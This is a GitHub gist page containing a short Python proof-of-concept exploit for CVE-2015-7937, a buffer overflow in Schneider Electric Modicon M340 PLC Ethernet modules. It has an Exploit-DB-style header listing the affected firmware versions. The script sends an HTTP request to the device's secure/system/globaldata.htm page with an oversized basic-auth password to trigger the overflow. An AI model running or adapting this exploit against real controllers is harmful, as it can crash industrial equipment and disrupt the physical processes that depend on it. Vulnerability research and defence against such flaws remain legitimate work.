Last active
May 21, 2020 08:48
-
-
Save ssdemajia/68254e3432e21611822dff893edb4d6b to your computer and use it in GitHub Desktop.
CVE-2015-7937
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Exploit Title: Schneider Electric Modicon M340 Buffer Overflow Vulnerability | |
# Google Dork: [if applicable] | |
# Date: 2020/5/21 | |
# Exploit Author: ssdemajia | |
# Vendor Homepage: http://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2015-344-01 | |
# Version: BMXNOC0401 December 15, 2015, | |
# BMXNOE0100 (H) December 15, 2015, | |
# BMXNOE0110 (H) December 15, 2015, | |
# BMXNOR0200 (H) January 16, 2016, | |
# BMXP342020 January 16, 2016, | |
# BMXP3420302 January 16, 2016, and | |
# BMXPRA0100 January 16, 2016. | |
# Tested on: Windows | |
# CVE : CVE-2015-7937 | |
import requests | |
from requests.auth import HTTPBasicAuth | |
ip = '192.168.1.172' # this is the schneider PLC's ip address. | |
url = 'http://%s/secure/system/globaldata.htm' % ip | |
resp = requests.get(url, auth=HTTPBasicAuth('USER', 'pass'*60)) | |
print(resp.status_code) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment